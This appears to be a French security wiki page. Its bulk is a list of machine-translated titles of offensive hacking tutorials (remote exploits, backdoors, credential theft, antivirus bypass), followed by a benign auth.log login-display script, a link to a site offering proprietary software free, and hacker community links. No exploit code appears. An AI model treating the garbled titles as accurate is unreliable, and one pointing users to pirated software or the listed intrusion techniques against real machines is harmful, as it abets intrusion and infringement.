Hack Remote PC Windows à l'aide de type Adobe Flash Player NetConnection Confusion
Hack PC à distance de Windows en utilisant la mémoire Adobe Flash Player Décompressez Via Zlib Variant Uninitialized
Hack Remote PC Windows en utilisant Adobe Flash Player copie Pixels à ByteArray dépassement d'entier
Hack PC à distance de Windows en utilisant Adobe Flash Player PCRE Regex Vulnérabilité
Hack Remote PC Windows en utilisant Adobe Flash Player tableau d'octets avec les travailleurs après utilisation gratuite
Hack Remote PC Windows en utilisant Adobe Flash Player tableau d'octets Décompressez via ZlibVariant utilisation après gratuit
Hack à distance Windows, Linux, OSX PC à l'aide d'injection Firefox Proxy Prototype Privileged JavaScript
Hack Remote PC Windows en utilisant Publier-It PUI Buffer Overflow (SEH)
Comment trouver l'utilisation de fichiers en distance victime PC (PC à distance Forensics)
Hack à distance Mot de passe Windows en utilisant Phishing Connexion Prompt Exploit
Hack PC à distance de Windows en utilisant Unicode Achat SEH Buffer Overflow
Hack Remote PC Windows en utilisant BulletProof FTP Client BPS Buffer Overflow
Hack Remote PC Windows à l'aide i-FTP Schedule Buffer Overflow
Test de pénétration du réseau en utilisant Android Phone (Tutorial Zanti Partie 1)
Hack Saved LastPass maître mot de passe dans Windows Remote, Linux, PC MAC
Hack PC sous Windows à distance à l'aide de Windows piste Popup Menu Win32k NULL Pointer Dereference
Hack Remote PC Windows en utilisant BadBlue Exploit
Comment Rassemblez correctifs appliqués à Windows PC à distance
Hack PC sous Windows à distance en utilisant l'exécution Wing FTP serveur Authenticated Commande
Hack à distance Windows, Linux ou MAC PC utilisant Firefox WebIDL Privileged Javascript Injection
Hack à distance Windows, Linux, MAC PC utilisant Firefox à cordes console.time Privileged JavaScript Injection
Comment supprimer tous les fichiers dans le PC à distance de Windows
Site Web Security Certificate Attaque sur PC à distance de Windows
Best of distance Astuces PC Windows Hacking (Partie 1)
Hack Caractéristiques ALL sécurité dans Windows Remote 7 PC
Comment shutdown, Logoff et Hibernate PC à distance de Windows
Hack WIFI Réglage du PC à distance de Windows
Hack PC à distance de Windows en utilisant Ericom AccessNow serveur Buffer Overflow
Comment faire pour modifier tous les fichiers d'extension dans le PC à distance (Confuse extensions de fichier Attack)
Hack Windows Remote PC en utilisant Easy File Gestion de serveur Web Stack Buffer Overflow
Rassemblez les cookies et l'histoire de Mozilla Firefox dans Windows à distance, Linux ou PC MAC
Hack Enregistrer mot de passe dans Mozilla Firefox dans Remote PC Windows, Linux ou MAC
Comment trouver ALL Excel, Office, PDF et images dans le PC à distance
Comment Rassemblez entrées MUICache dans Windows PC à distance
Comment Crash Course Wireshark de PC à distance en utilisant CAPWAP Dissector DoS
Collecte de l'information et WLAN Géolocalisation de Remote PC Windows, Linux ou MAC
Hack Remote PC Windows en utilisant Windows NT Message utilisateur Appel Win32k Kernel débordement du pool (Schlamperei)
Hack PC à distance en utilisant Wireshark écoute électronique / mpeg.c Stack Buffer Overflow
Hack à distance Victim PC avec le document MS Office
Définir nouveau mot de passe de la victime PC Remotely
Hack Remote PC Windows en utilisant WinRAR Nom du fichier Spoofing
Comment Rassemblez Skype Logs, Firefox Histoire et histoire Chrome de distance Victim PC
Pompem - outil pour trouver des Exploits dans la base de données Major
Bypass UAC Protection de Remote PC Windows dans la mémoire Injection
Hack PC à distance de Windows en utilisant ALLPlayer M3U Buffer Overflow
Hack Internet Explorer dans le PC à distance réglé votre page d'accueil souhaitée
Hack PC à distance de Windows en utilisant totale Video Player 1.3.1 Buffer Overflow
Comment faire pour supprimer les mots de passe / Cookies / Histoire / Temp Internet File d'Internet Explorer à distance Victim PC
Forensics Enquête sur les PC à distance (Partie 2)
Comment verrouiller le lecteur de Windows à distance Victim PC
Hack Remote PC Windows en utilisant Audiotran PLS Fichier Stack Buffer Overflow
Hack PC à distance de Windows en utilisant Easy CD-DA Recorder PLS Buffer Overflow
Comment faire pour effectuer un écran bleu de la mort Attaque sur distance Windows 7 PC
Réduction de la taille de la partition de PC à distance de Windows
Forensics Enquête sur les PC à distance (Partie 1)
HackPack - Collection de scripts Hacking
PwnSTAR: Pwn SofT Ap SCRIPT
LazyKali -script pour Kali Linux
Hack Android Phone avec Metasploit dans Kali Linux
Remotely Balayez Malware / Virus dans Victim PC avec Metasploit
Hack à distance de Windows 7 PC utilisant IBM Forms Viewer Unicode Buffer Overflow
Hack PC distant à l'aide de Real Networks RealPlayer Version Attribut Buffer Overflow
Hack PC distant à l'aide d'Adobe Reader ToolButton Utilisation Après gratuit
Comment Diffusion vidéo YouTube dans le système à distance de Windows
Hack PC à distance avec Windows EPATHOBJ :: pprFlattenRec Privilege Escalation Local
Hacked PC à distance Avec Refroidir PDF Flux d'images Buffer Overflow
Hack PC à distance en utilisant Open Office Exploit
PC à distance Hacked Utiliser Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
Hack PC en réseau à l'aide MJM de base Joueur 2011 .s3m Stack Buffer Overflow
Exploit PC en LAN à l'aide Ombre Stream Recorder 3.0.1.7 Buffer Overflow
Hack PC à distance utilisant MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
Obtenez Privilege Administrateur de la victime à distance PC sous Windows Escalation SYSTEM via KiTrap0D
Hack PC à distance utilisant Beetel Connection Manager netconfig.ini Buffer Overflow
Hack PC en réseau à l'aide de fichiers Thème Microsoft Windows Manipulation exécution de code arbitraire
Hack Windows Remote PC utilisant Pcman FTP Server Post-Authentication STOR commande Stack Buffer Overflow
Hack PC à distance de Windows Utilisation de A-PDF WAV en MP3 v1.0.0 Buffer Overflow
Exploit Remote PC Windows en utilisant XMLSerializer Firefox utilisation Après gratuit
Accès Kali Linux à distance sur le système Windows via Putty
Hack Remote PC Windows ou Linux avec Java magasin image Array () Tableau Invalid Indexation Vulnérabilité
Hack PC à distance en utilisant Intrasrv 1.0 Buffer Overflow
Hack PC à distance en utilisant MiniWeb (Build 300) arbitraire File Upload
Exploit PC Windows en utilisant Ultra Overflow Mini HTTPD Stack Buffer
Hack PC à distance, IPhone, Android utilisant XSSF dans Metasploit
Hack FTP à distance en utilisant Open-FTPD 1.2 arbitraire File Upload
Hack à distance de Windows 7 PC en utilisant Chasys Draw IES Buffer Overflow
Scripting Framework XSSF Cross-Site dans Metasploit (Partie 1)
Bypass Antivirus et PC sous Windows Hack à distance avec Seringue
Hack Remote PC Windows en utilisant Apple Quicktime 7 Invalid Atom Longueur Buffer Overflow
Exploit Windows PC à distance en utilisant Corel PDF Fusion Stack Buffer Overflow
Hack Windows 7 PC à distance en utilisant MediaCoder .M3U Buffer Overflow
Hack Windows 7 PC à distance en utilisant ERS Viewer fichier 2013 ERS Handling Buffer Overflow
Hack PC à distance de Windows en utilisant ABBS Audio Media Player .LST Buffer Overflow
Hack Windows, Linux ou MAC PC utilisant Java Applet fournisseur Skeleton Insecure Invoke Méthode
Hack PC Windows en utilisant Privilege Escalation local Novell Client 4.91 SP4
Exploit Windows, Linux ou MAC PC utilisant Java Applet Driver Manager toString Privileged () Exécution de code à distance
Hack PC à distance à l'aide de Sun Java Web Start Double Quote Injection
Comment faire pour installer Simple-Ducky Payload Générateur
Voile - Un générateur Metasploit Payload Bypass Antivirus
Hack Windows, Linux ou MAC PC utilisant Firefox 17.0.1 + flash code Privileged Injection
Hack Windows PC distant à l'aide AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass
Récupérer les données supprimées de distance Victim PC
Exploit Remote PC Windows en utilisant ERS Viewer fichier 2011 ERS Handling Buffer Overflow
Hack PC Windows en utilisant AudioCoder .M3U Buffer Overflow
Hack à distance Windows, Linux ou MAC PC utilisant Java Applet Type de réflexion Confusion Exécution de code à distance
Hack PC à distance en utilisant Free Float serveur FTP USER Commande Buffer Overflow
Comment Crypter lecteur de distance Victim PC
Hack PC Windows à l'aide de Java CMM à distance l'exécution de code
Comment faire pour installer linux Kali guide étape par étape
Hack PC Windows en utilisant la base de données Firebird Relational CNCT Groupe Nombre Buffer Overflow
OWASP Xenotix XSS Exploit v3-cadre 2013
Exploit Windows, Linux ou MAC PC utilisant Java Applet JMX à distance l'exécution de code
Comment Rassemblez Dump Fichiers récents de PC à distance
Windows gérer User Level Payload Persistent Installer
Hack netNTLM Credential utilisant Microsoft Word chemin UNC Injector
Comment verrouiller / Dossier Unlock dans Victim Remote PC en utilisant Metasploit
Comment faire pour obtenir l'accès administrateur du PC à distance en utilisant le noyau Windows Intel x64 SYSRET vulnérabilité Exploit
Hack Remote PC Windows en utilisant VMWare OVF Outils Format Chaîne vulnérabilité
Comment masquer Fichier distance Victim PC
Hack à distance Mot de passe Windows en utilisant Keylogger dans Meterpreter
Comment vérifier la fonction Remote Desktop activé dans le réseau avec Metasploit
Hack à distance de Windows Les mots de passe en texte brut avec WCE
Windows gérer la mémoire Payload Injection
Attaquer sur Windows, Linux ou MAC PC utilisant Java Applet Méthode Poignée d'exécution de code à distance
Hack Windows, Linux ou MAC PC utilisant Java Applet AverageRangeStatisticImpl à distance l'exécution de code
Exploit PC Windows en utilisant Freesshd Authentication Bypass
Hack Windows, Linux ou MAC PC utilisant Java Applet JMX à distance l'exécution de code
Hack PC Windows en utilisant Orbital Viewer ORB Fichier Parsing Buffer Overflow
Hack PC Windows en utilisant le nom CyberLink Power2Go attribut (P2G) Stack Buffer Overflow Exploit
Hack Remote PC Windows en utilisant Real player RealMedia Gestion des fichiers Buffer Overflow
Comment faire pour activer le Bureau à distance en Victim PC en utilisant Metasploit
Comment hacker fichier hosts de Windows Remote 7 PC (Host Injection File)
Comment Hack XAMPP de PC à distance en utilisant Metasploit
Contourner Antivirus utilisant multi Pyinjector Shell Code Injection dans SET Toolkit
Netdiscover - Active / Passive ARP Scanner
Hack PC Windows en utilisant Neiwork FreeFloat FTP Server arbitraire de fichiers Upload
Exploting Windws 7 PC en utilisant Maxthon3 sur: XCS historique Trusted Execution code Zone
Comment faire pour supprimer Local compte du PC à distance en utilisant Metasploit utilisateur
Comment utiliser Nmap (Tutoriel Débutant)
Hack Windows 7 PC en réseau local en utilisant Blaze Video HDTV Player Pro v6.6 Nom du fichier Manipulation Vulnérabilité
Comment obtenir Password Hint de distance Victim PC
Hack PC à distance avec Apple QuickTime 7.7.2 texml Style Element police table Champ Stack Buffer Overflow
Hack Remote PC Windows ou Linux en utilisant Java Applet JAX-WS à distance l'exécution de code
De Windows Rassemblez Directory Autorisations Enumeration
Comment faire pour installer BeEF dans Windows PC
Best of Metasploit Meterpreter Script
Best of JAVA Hacking Exploit
Hack PC à distance en utilisant Orbit Downloader URL Unicode Conversion Overflow
Comment Rassemblez application installée dans Victim PC
Comment Rassemblez Drive USB Histoire de la victime PC
Comment Rassemblez Connexion sans fil actuelle Infos du PC à distance
Comment Déconnecter la connexion sans fil de PC à distance
Comment faire pour trouver tous connectés réseau sans fil dans le PC à distance
Comment Rassemblez de Windows Product Key de distance victime PC
Comment Rassemblez Mot de passe Microsoft Outlook enregistrées dans le PC à distance
Comment Hack Enregistrer mot de passe dans FileZilla du PC à distance
Comment détecter Installer OS Victim BOX virtuel
Best of Mozilla Firefox Hacking Exploits
Test Pen pour iPhone Part 1
Comment contourner la protection de Windows Escalate UAC
Hack paramètres de l'UAC dans Windows 7 en utilisant Metasploit
Hack à distance Linux PC utilisant msfpayload dans BackTrack
Cymothoa - injection de shellcode Runtime Backdoors
Comment faire pour créer une porte dérobée dans Server en utilisant BackTrack (Tutorial Weevely)
Webacoo - Web Backdoor Cookie Script-Kit
Hack Remote PC Windows à l'aide Ouvrir VPN Trusted Escalation Chemin Privilège
Hack Windows 7 PC en utilisant périphérique USB et SET Toolkit (Infectious Générateur médias Attack)
attaque d'injection PyInjector Shellcode sur PC à distance en utilisant l'ingénierie sociale Toolkit
Hack PC à distance en utilisant Microsoft Internet Explorer exec commande Utilisez-Après-Free Vulnérabilité
Comment trouver OS de PC à distance (OS Footprinting)
Hack PC à distance de Windows en utilisant Ratte Server Toolkit ingénierie sociale
Hack à distance de Windows 7 PC en utilisant Winamp MAKI Buffer Overflow
Hack Remote PC Windows ou Linux en utilisant Java 7 Applet à distance l'exécution de code
Hack Windows7 PC en utilisant Powershell Vecteur d'attaque en génie Toolkit Social (Contourner Antivirus)
Attaquer sur PC à distance en utilisant Adobe Flash Player 11.3 police code Parsing Exécution
Hack à distance de Windows 7 PC Easy Way (Tutorial Msfvenom)
Hack Remote PC Windows en utilisant Microsoft Office MS12-027 mot MSCOMCTL ActiveX Buffer Overflow
Hack à distance de Windows 7 PC en utilisant SCAPE global ZIP mignon Stack Buffer Overflow
BlindElephant-Web Application fingerprinter
Hack à distance de Windows 7 PC à l'aide simple connexion au serveur Web Buffer Overflow Header
Mutillidae (Pen-Test Web Application pratique)
Hack à distance de Windows 7 PC en utilisant Microsoft XML Core Services MSXML mémoire non initialisée corruption
Hack PC à distance en utilisant Java Applet Champ Bytecode Verifier Cache à distance l'exécution de code
Hack Windows 7 PC avec Poison Ivy 2.3.2 C & C Serveur Buffer Overflow
Hack Windows PC à distance avec Apple QuickTime texml Stack Buffer Overflow
Hack PC à distance de Windows en utilisant Adobe Flash Player Type d'objet Confusion
Hack PC Windows en utilisant LAN 0.6b0 Fat Lecteur Media Player Buffer Overflow
Hack PC Windows en utilisant Lattice Semiconductor PAC-Designer 6.21 Symbole Valeur Buffer Overflow
Hack PC à distance de Windows en utilisant TFM MMPlayer (m3u / ppl File) Buffer Overflow
Hack Windows 7 en utilisant Microsoft Office Cliquez Une fois Unsafe Object Package Handling Vulnérabilité
Hack PC sous Windows à distance en utilisant la vidéo LAN VLC ModPlug ReadS3M Stack Buffer Overflow
Hack Remote PC XP en utilisant Microsoft Windows OLE Object File Handling Exécution de code à distance
Hack Remote PC Windows en utilisant CCMplayer 1,5 m3u Playlist Stack Based Buffer Overflow
Hack Remote PC Windows en utilisant Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
Hack Remote PC Windows à l'aide d'Internet Explorer COM Créer Code Objet Exécution
Hack Remote PC Windows en utilisant le document Mozilla Firefox entrelacé. écrire / ajouter des enfants de corruption de mémoire
Hack PC à distance de Windows en utilisant Mozilla Firefox Array.reduceRight () Integer Overflow
PC Hack Windows dans LAN à l'aide d'Internet Explorer Web View Folder Icon setSlice () Dépassement
Hack Remote PC Windows en utilisant Microsoft DirectShow (msvidctl.dll) MPEG-2 de corruption de mémoire
Hack PC à distance en utilisant Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnérabilité
Hack PC à distance en utilisant Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
Wapiti - application Web vulnérabilité scanner
PC Hack de Windows dans le réseau en utilisant VLC Media Player réel texte sous-titres Overflow
Hack PC à distance de Windows en utilisant MicroP 0.1.1.1600 (File MPPL) Stack Buffer Overflow
Hack PC à distance de Windows en utilisant VUPlayer M3U Buffer Overflow
Hack Remote PC Windows en utilisant Foxit PDF Reader 4.2 Fichier JavaScript Ecrire Exploit
Hack PC Windows à distance à l'aide de fichiers ispVM système XCF Manipulation Overflow
Hack PC Windows en utilisant Apple QuickTime 7.6.6 Invalid URI SMIL Buffer Overflow
Hack à distance de Windows XP à l'aide de Sun Java Web Start Plugin Command Line Argument Injection
Hack à distance XP PC en utilisant Adobe util.printf () Buffer Overflow
Hack tout PC en réseau local en utilisant Adobe Doc.media.newPlayer Utilisation Après la vulnérabilité gratuit
Hack PC en LAN à l'aide de Dépassement de Tampon de Wireshark LWRES Dissector
Hack Remote PC Windows avec Astonsoft DeepBurner (Fichier DBR) Chemin Buffer Overflow
web-douleur - A Scanner Web à distance pour la version Détection, Misconfiguration et Server Enumeration
Hack PC Windows en utilisant Awing souple Winds3D Joueur 3,5 SceneURL Téléchargement et exécution
Comment faire pour créer Backdoor en PC à distance (Tutorial metsvc)
Hack Remote PC Windows en utilisant Winamp Media Player
Hack PC Windows en utilisant Wireshark <= 1.4.4 paquet-dect.c Stack Buffer Overflow (à distance)
Attaquer sur PC à distance si la victime utilise Wireshark
w3af -Web Attaque application et de vérification (partie Tutoriel 1)
Comment faire pour capturer Connexion avec java HTTP Script Keylogger dans Metaspolit
Hack Windows XP en utilisant Adobe Reader U3D mémoire la vulnérabilité de corruption
Hack PC Windows en utilisant Foxit Reader 3.0 Ouvrir Exécuter une action basée sur la Pile Buffer Overflow
Hack Remote PC Windows en utilisant ACDSee FotoSlate PLP Fichier id Paramètre Overflow
Comment attaquer sur PC à distance en utilisant le code HTTP Technique d'injection
Subterfuge (Man-in-the-Middle Cadre d'attaque)
Tutorial PentBox (Un outil Test de pénétration)

Télécharger des logiciels propriétaires, gratuitement

Ce site permet de télécharger de nombreux logiciels propriétaires, gratuitement : https://getintopc.com
A utiliser avec réserve, privilégier les logiciels libres.

Reverse Engineering

Une suite d'outils de RSE (Software Reverse Engineering) développés par la Direction de la recherche de la NSA à l'appui de la mission de cybersécurité
Télécharger Ghidra : https://ghidra-sre.org
Télécharger les applications Open Source mises à disposition par la NSA : https://code.nsa.gov

Shadow

Jouer en ultra sans changer de PC.
Shadow permet de faire tourner tous les derniers jeux et logiciels sur un vieux PC, un Mac ou une TV.
Plus besoin de racheter de matériel, il suffit de télécharger l’application.
Offre payante à partir de 29,95€/mois.
Site officiel : https://shadow.tech

Afficher la liste des dernières connexion sur le bureau

Quand je me connecte, j'aime bien savoir quelles sont été les dernières tentatives de connexion, locales ou distantes (ssh), en succès ou en échec. J'utilise Conky pour afficher ça pendant une trentaine de secondes sur mon bureau quand je me connecte.
Le fichier Python que je met dans ~/apps/scripts/filter-logins.py. Ce script Python m'extrait/filtre/reformate le contenu de /var/log/auth.log:
#!/usr/bin/python
# coding: utf8
import sys,re
sortie = []
for line in open('/var/log/auth.log','r'):
 dateevt = line[:15]
 # ssh
 results = re.findall('Failed password for (.+?) from (\d+.\d+.\d+.\d+)',line)
 if results: sortie += [ "%s - ssh   FAILED  for %s (%s)" % (dateevt,results[0][0],results[0][1]) ]
 results = re.findall('Accepted password for (.+?) from (\d+.\d+.\d+.\d+)',line)
 if results: sortie += [ "%s - ssh   success for %s (%s)" % (dateevt,results[0][0],results[0][1]) ]
 # pam local:
 results = re.findall('session opened for user (.+?)\s',line)
 if results: sortie += [ "%s - local success for %s" % (dateevt,results[0]) ]
 results = re.findall('authentication failure; .+? user=(.+?)\s',line)
 if results: sortie += [ "%s - local FAILED  for %s" % (dateevt,results[0]) ]
 
sortie= [line for line in sortie if 'root' not in line]
 
for line in sortie[-10:]:
   print line
Penser à rendre le script exécutable: chmod +x ~/apps/scripts/filter-logins.py
Mon fichier ~/.conkyrc:
alignment bottom_right
default_color grey
use_xft yes
xftfont DejaVu Sans Mono:weight=Bold:size=10
update_interval 9999.0
TEXT
Dernières connexions:
${exec /home/sebsauvage/apps/scripts/filter-logins.py}
Et j'ajoute dans les applications au démarrage de session:
bash -c "conky -b -d -p 10; sleep 40; pkill conky"
Exemple de sortie:
Dernières connexions:
Mar 30 10:21:14 - ssh   FAILED  for sebsauvage (127.0.0.1)
Mar 30 10:21:22 - ssh   success for sebsauvage (127.0.0.1)
Mar 30 10:21:22 - local success for sebsauvage
Mar 30 10:25:47 - local FAILED  for sebsauvage
Source : https://sebsauvage.net/wiki/doku.php?id=mint_customization_17_3&redirect=1#notes_diverses

LAN - WAN - DMZ - Projet de Sécurité des réseaux

LAN - WAN - DMZ - Projet de Sécurité des réseaux : https://www.developpez.net/forums/d1276223/systemes/linux/securite/projet-securite-reseaux/#post11133738

Dictionnaire

Dictionnaire.

Bibliographie

Consulter le sommaire sur la sécurité : Sommaire Sécurité.
MontréHack : Apprentissage et partage de connaissance sur la sécurité informatique en travaillant des problèmes appliqués : https://montrehack.ca/archives.html
Liste des HackerSpace français : https://wiki.hackerspaces.org/France
Zataz - S'informer - Se sécuriser : https://www.zataz.com
Rafale : Site officiel : http://rafale.org - Archives : https://archive.org/download/RafaleZine

Communautés de Hacker

Échanger avec les communautés White Hat, Red Hat, Grey Hat et Black Hat pour rester informé et monter en compétence.

Hackerspace de Lausanne

Fixme : www.fixme.ch
Fichier:FixeMe.jpeg

Hackerspace en Australie

wiki.hackerspaces.org/Australia

HackerSpace de Strasbourg

HackStub : hackstub.netlib.re/landpage/

Hackerspace de Suisse

panglosslabs.org/?lang=fr

Hackerspace de Russie

Neuron HackerSpace - neuronspace.ru

Autres communautés

HackBBS

Site officiel - http://hackbbs.org
Le FTP de HackBBS : ftp://hackbbs.org
Réseau Social HackBBS : yyy

HackerOne

HackerOne est une plate-forme de coordination des vulnérabilités et de bogues qui relie les entreprises aux chercheurs en cybersécurité.
En février 2017, le réseau de HackerOne comprenait environ 100 000 hackers.
Site officiel : www.hackerone.com

Macbidouille

www.macbidouille.com

Root-Me

Site officiel : www.root-me.org

Les bases du hacking

Site officiel : bases-hacking.org

Newbiecontest

Site officiel : www.newbiecontest.org

Zenk Security

Site officiel : www.zenk-security.com

La French tech

Les entreprises françaises innovent et créent le monde de demain
https://www.gouvernement.fr/amazing-french-tech

Mise à disposition de CTF

Des challenges pour progresser en informatique !
https://ctftime.org/event/list/upcoming

Listes de diffusions

Debian Francophone : debian-user-french@lists.debian.org
HackerSpace Russe Neuron : neuronspace.ru
Hackstub : hackstub.netlib.re/landpage/
LaQuadratureDuNet Discussion : discussion@laquadrature.net
LaQuadratureDuNet Graphisme : graphisme@laquadrature.net
LaQuadratureDuNet Juridique : juridique@laquadrature.net

Wiki et Hackerspace

Hackstub wiki : hackstub.netlib.re/wiki/index.php?title=Accueil

Kitploit

www.kitploit.com

Magazines

Actualité hacking, sécurité, vie privée : www.zataz.com
Undernews : www.undernews.fr/theme/hacking-hacktivisme
Devenir un Hacker : www.secuser.com/dossiers/devenir_hacker.htm

NAVIGATION

PARTICIPER ET PARTAGER

Vous êtes sur le wiki de Vision du Web.
Les pages présentées sur le wiki évoluent tous les jours.
Certaines recherches sont peu abouties et incluent des erreurs.
Pour participer sur le wiki, créer un compte utilisateur en haut à droite.
La recherche interne du wiki permet de trouver le contenu qui vous intéresse.
Les informations présentes sur ce wiki sont issues d'une recherche personnelle.
Identifiez-vous pour poser vos questions sur la page de discussion de VisionDuWeb.
Améliorer le contenu des pages en faisant des propositions depuis l'onglet discussion.
Les informations du wiki ne doivent pas servir à nuire à autrui ou à un système informatique.
De nombreux outils gratuits sont listés et disponibles dans la boîte à outils de Vision du web.
D'autres pages du wiki peuvent correspondre à vos attentes. La liste de toutes les pages du wiki.

VALORISER LE WIKI

Valoriser le contenu partagé sur le wiki avec un don en monnaie numérique :
AEON - Bitcoins - Bitcoins Cash - Bitcoins Gold - Bitcore - Blackcoins - Basic Attention Token - Bytecoins - Clams - Dash - Monero - Dogecoins - Ğ1 - Ethereum - Ethereum Classique - Litecoins - Potcoins - Solarcoins - Zcash

OBTENIR DE LA MONNAIE NUMERIQUE

Obtenir gratuitement de la monnaie numérique :
Gagner des Altcoins - Miner des Altcoins.
Consulter le miroir du wiki depuis Planet Hoster : Le miroir du wiki version du 12 Juillet 2019.